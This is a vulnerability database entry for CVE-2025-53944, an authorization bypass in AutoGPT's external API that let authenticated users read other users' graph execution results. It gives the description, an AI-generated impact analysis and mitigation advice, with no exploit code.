Skip to main content

CVE-2025-53944: CWE-285: Improper Authorization in Significant-Gravitas AutoGPT

High
VulnerabilityCVE-2025-53944cvecve-2025-53944cwe-285
Published: Wed Jul 30 2025 (07/30/2025, 14:28:36 UTC)
Source: CVE Database V5
Vendor/Project: Significant-Gravitas
Product: AutoGPT

Description

AutoGPT is a platform that allows users to create, deploy, and manage continuous artificial intelligence agents. In v0.6.15 and below, the external API's get_graph_execution_results endpoint has an authorization bypass vulnerability. While it correctly validates user access to the graph_id, it fails to verify ownership of the graph_exec_id parameter, allowing authenticated users to access any execution results by providing arbitrary execution IDs. The internal API implements proper validation for both parameters. This is fixed in v0.6.16.

AI-Powered Analysis

AILast updated: 07/30/2025, 15:02:43 UTC

Technical Analysis

CVE-2025-53944 is a high-severity authorization bypass vulnerability affecting Significant-Gravitas AutoGPT versions prior to 0.6.16. AutoGPT is a platform designed for creating, deploying, and managing continuous AI agents, which rely on graph-based execution workflows. The vulnerability exists in the external API endpoint get_graph_execution_results, which is intended to return execution results for a given graph. While the API correctly validates user access to the graph_id parameter, it fails to verify ownership or authorization for the graph_exec_id parameter. This flaw allows any authenticated user to supply arbitrary execution IDs and retrieve execution results belonging to other users, bypassing intended access controls. The internal API correctly enforces validation on both parameters, but the external API's improper authorization check constitutes a CWE-285 (Improper Authorization) weakness. The vulnerability does not require user interaction and can be exploited remotely over the network with low complexity, given that the attacker must be authenticated (PR:L). The CVSS 3.1 base score of 7.7 reflects high confidentiality impact due to unauthorized data disclosure, no impact on integrity or availability, and a scope change since the vulnerability affects resources beyond the attacker's privileges. This issue was fixed in version 0.6.16 of AutoGPT. No known exploits are reported in the wild as of the published date.

Potential Impact

For European organizations using AutoGPT, especially those leveraging AI agents for sensitive or proprietary workflows, this vulnerability poses a significant risk to confidentiality. Unauthorized access to execution results could expose sensitive AI decision-making data, intellectual property, or personal data processed by the AI agents. This could lead to data breaches, regulatory non-compliance (e.g., GDPR violations), and loss of competitive advantage. Since the vulnerability does not affect integrity or availability, operational disruption is unlikely, but the exposure of confidential information alone can have severe reputational and financial consequences. Organizations in sectors such as finance, healthcare, research, and government that adopt AutoGPT for AI automation are particularly at risk. The requirement for authentication limits exploitation to insiders or compromised accounts, but insider threats or credential theft scenarios remain plausible. The scope change indicates that attackers can access data beyond their authorized domain, increasing the severity of the breach.

Mitigation Recommendations

European organizations should immediately upgrade AutoGPT to version 0.6.16 or later to remediate this vulnerability. Until patching is possible, organizations should restrict access to the external API endpoints to trusted networks and users, implement strict monitoring and logging of API calls to detect anomalous access patterns, and enforce strong authentication and authorization controls, including multi-factor authentication to reduce the risk of credential compromise. Additionally, organizations should conduct audits of existing execution results access logs to identify potential unauthorized access. Network segmentation and API gateway policies can be employed to limit exposure of the vulnerable endpoint. Developers should review custom integrations with AutoGPT to ensure they do not bypass internal API protections. Finally, organizations should incorporate this vulnerability into their incident response plans and ensure staff are aware of the risk and remediation steps.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
GitHub_M
Date Reserved
2025-07-14T17:23:35.262Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 688a3097ad5a09ad00a852b6

Added to database: 7/30/2025, 2:47:51 PM

Last enriched: 7/30/2025, 3:02:43 PM

Last updated: 7/31/2025, 5:31:30 AM

Views: 8

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats